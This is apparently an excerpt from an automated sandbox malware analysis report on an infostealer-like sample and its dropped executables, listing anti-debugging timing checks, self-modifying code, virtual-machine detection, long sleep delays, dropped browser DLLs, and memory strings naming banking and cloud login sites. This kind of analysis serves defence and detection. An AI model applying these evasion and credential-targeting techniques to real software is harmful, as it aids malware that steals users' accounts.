Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C3EB8 second address: 5C3F02 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0E94F51A55h 0x0000000b jmp 00007F0E94F51A4Bh 0x00000010 jbe 00007F0E94F51A52h 0x00000016 popad 0x00000017 push eax 0x00000018 push ebx 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c pop eax 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007F0E94F51A46h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C3F02 second address: 5C3F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C4079 second address: 5C40A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0E94F51A4Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0E94F51A4Fh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C40A1 second address: 5C40A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C40A5 second address: 5C40C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E94F51A56h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C40C1 second address: 5C40C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C40C7 second address: 5C40D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E94F51A4Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C40D8 second address: 5C40DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C4625 second address: 5C4639 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A50h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C6C9B second address: 5C6CEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jns 00007F0E948C9FD0h 0x00000011 push esi 0x00000012 jmp 00007F0E948C9FC8h 0x00000017 pop esi 0x00000018 pop eax 0x00000019 mov dword ptr [ebp+122D18C5h], eax 0x0000001f push 00000003h 0x00000021 and ecx, dword ptr [ebp+122D2834h] 0x00000027 push 00000000h 0x00000029 mov di, si 0x0000002c push 00000003h 0x0000002e mov edi, eax 0x00000030 call 00007F0E948C9FB9h 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C6CEC second address: 5C6D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0E94F51A57h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push ebx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Special instruction interceptor: First address: ABECF7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Special instruction interceptor: First address: ABEC2B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Special instruction interceptor: First address: C9B835 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Special instruction interceptor: First address: C8145C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Special instruction interceptor: First address: CFE86A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Special instruction interceptor: First address: 5F0237 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Special instruction interceptor: First address: 5F0678 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: F2ECF7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: F2EC2B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 110B835 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 10F145C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Special instruction interceptor: First address: 674853 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 116E86A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: BD0237 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: BD0678 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: C54853 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Memory allocated: F80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Memory allocated: 2B90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Memory allocated: 1200000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe

Code function: 5_2_04EC0983 rdtsc

5_2_04EC0983

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1125
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1119
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1162
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1146
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1131
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1184
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 3508
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 3216
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 428
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Window / User API: threadDelayed 3869
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Window / User API: threadDelayed 4566

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 6.3 %

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4676	Thread sleep count: 1125 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4676	Thread sleep time: -2251125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5804	Thread sleep count: 1119 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5804	Thread sleep time: -2239119s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6204	Thread sleep count: 1162 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6204	Thread sleep time: -2325162s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3920	Thread sleep count: 282 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3920	Thread sleep time: -8460000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6096	Thread sleep count: 1146 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6096	Thread sleep time: -2293146s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5828	Thread sleep count: 1131 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5828	Thread sleep time: -2263131s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4304	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5448	Thread sleep count: 1184 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5448	Thread sleep time: -2369184s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4708	Thread sleep count: 62 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4708	Thread sleep time: -124062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3372	Thread sleep count: 57 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3372	Thread sleep time: -114057s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5240	Thread sleep count: 242 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5240	Thread sleep time: -7260000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1896	Thread sleep count: 58 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1896	Thread sleep time: -116058s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1888	Thread sleep count: 3508 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1888	Thread sleep time: -7019508s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5020	Thread sleep time: -900000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4072	Thread sleep count: 3216 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4072	Thread sleep time: -6435216s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4072	Thread sleep count: 260 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4072	Thread sleep time: -520260s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1888	Thread sleep count: 428 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1888	Thread sleep time: -856428s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe TID: 2748	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe TID: 6648	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe TID: 8424	Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe TID: 8452	Thread sleep time: -48000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_004139B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004143F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	0_2_00414050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_004133C0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00401160 GetSystemInfo,ExitProcess,

0_2_00401160

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: ba77748b9b.exe, 0000002E.00000002.2853920976.000000000274D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWd
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.13.dr	Binary or memory string: vmci.sys
Source: KJEHJKJE.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: KJEHJKJE.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: KJEHJKJE.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: KJEHJKJE.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: axplong.exe, axplong.exe, 0000000A.00000002.2311209476.00000000010C1000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.2374969784.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000010.00000002.2374830999.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ba77748b9b.exe, 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareoC
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual USB Mouse
Source: KJEHJKJE.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Amcache.hve.13.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: KJEHJKJE.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: KJEHJKJE.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Amcache.hve.13.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: KJEHJKJE.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: KJEHJKJE.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: KJEHJKJE.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: KJEHJKJE.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.13.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin`
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.13.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: KJEHJKJE.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: KJEHJKJE.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RoamingBKKFHIEGDH.exe, 00000005.00000002.2269772396.0000000000C51000.00000040.00000001.01000000.00000009.sdmp, RoamingAEGIJKEHCA.exe, 00000008.00000002.2345735174.00000000005CE000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, 00000009.00000002.2308351470.00000000010C1000.00000040.00000001.01000000.0000000D.sdmp, axplong.exe, 0000000A.00000002.2311209476.00000000010C1000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.2374969784.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000010.00000002.2374830999.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: KJEHJKJE.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.13.dr	Binary or memory string: VMware
Source: KJEHJKJE.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: KJEHJKJE.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2420117641.00000000026F9000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.0000000002825000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2881327122.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3029095226.000001F16D6CC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2918689311.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 